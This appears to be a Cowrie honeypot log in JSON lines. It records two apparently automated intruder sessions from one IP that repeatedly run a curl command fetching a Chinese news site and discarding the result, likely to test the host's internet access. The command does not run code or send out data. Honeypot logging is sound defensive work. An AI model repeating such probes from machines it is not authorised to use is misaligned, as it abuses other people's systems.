{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.519426Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.551467Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.553145Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.597513Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.599003Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.605155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.606292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.619843Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.620665Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.629652Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.657025Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.658385Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.664429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.665504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.698781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.699922Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.702417Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.703153Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.705372Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.745636Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.746767Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.750001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.751154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.786547Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.789681Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.790905Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.792793Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.794119Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.828658Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.832274Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.833424Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.838423Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.839806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.870744Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.873086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.874486Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.879689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.880752Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.907279Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.913066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.914166Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.920201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.921223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.955005Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.961846Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.963039Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:18.969110Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:18.970787Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.008097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.009882Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.016280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.017478Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.019226Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.039245Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.055387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.056520Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.059625Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.066317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.067439Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.080197Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.082110Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.097225Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.098694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.108392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.109496Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.118585Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.120355Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.138012Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.139294Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.148079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.149294Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.170321Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.177046Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.178235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.187351Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.189987Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.191578Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.219287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.220638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.238340Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.240559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.241547Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.244157Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.262598Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.263879Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.293243Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.294826Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.297084Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.300452Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.321868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.323317Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.328440Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.367617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.369086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.379969Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.381498Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.383271Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.389695Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.410700Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.411917Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.419647Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.420860Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.433787Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.436153Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.450689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.451730Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.457951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.459084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.474993Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.477422Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.490964Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.492168Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.494378Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.495445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.514564Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.516444Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.530880Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.532384Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.536581Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.538067Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.551552Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.554033Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.573718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.575156Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
